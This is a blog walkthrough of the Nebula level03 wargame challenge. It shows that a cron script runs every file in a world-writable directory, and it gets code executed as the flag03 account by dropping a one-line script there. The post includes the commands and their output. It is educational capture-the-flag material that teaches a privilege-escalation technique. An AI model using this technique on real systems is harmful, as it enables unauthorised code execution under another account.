Monday, October 29, 2012

exploit-exercises Nebula: level03


In level03 challenge of Nebula, we are told that there is a crontab running every couple of minutes.
level03@nebula:/home/flag03$ ls -ltotal 8
drwxrwxrwx 2 flag03 flag03 4096 2012-10-29 03:03 writable.d
-rwxr-xr-x 1 flag03 flag03   98 2011-11-20 21:22 writable.sh
writable.d is a directory and as its name suggests, is world readable/writable.
writable.sh is the script that is executed every couple of minutes by the crontab.
level03@nebula:/home/flag03$ cat writable.sh #!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
The vulnerability lies in writable.sh running every file that in the writable.d directory combined with the fact that writable.d is world writable.
To exploit this vulnerability, we will write a script that will run the /bin/getflag program when executed.
level03@nebula:/home/flag03/writable.d$ echo "/bin/getflag >> /tmp/pwnlog03" > pwnie03
level03@nebula:/home/flag03/writable.d$ cat pwnie03
/bin/getflag >> /tmp/pwnlog03
After some time, the pwnie03 script will be run (and deleted afterwards by writable.sh).
level03@nebula:/home/flag03/writable.d$ ls
level03@nebula:/home/flag03/writable.d$ cat /tmp/pwnlog03 

You have successfully executed getflag on a target account
And that is it, level03 done.

No comments:

Post a Comment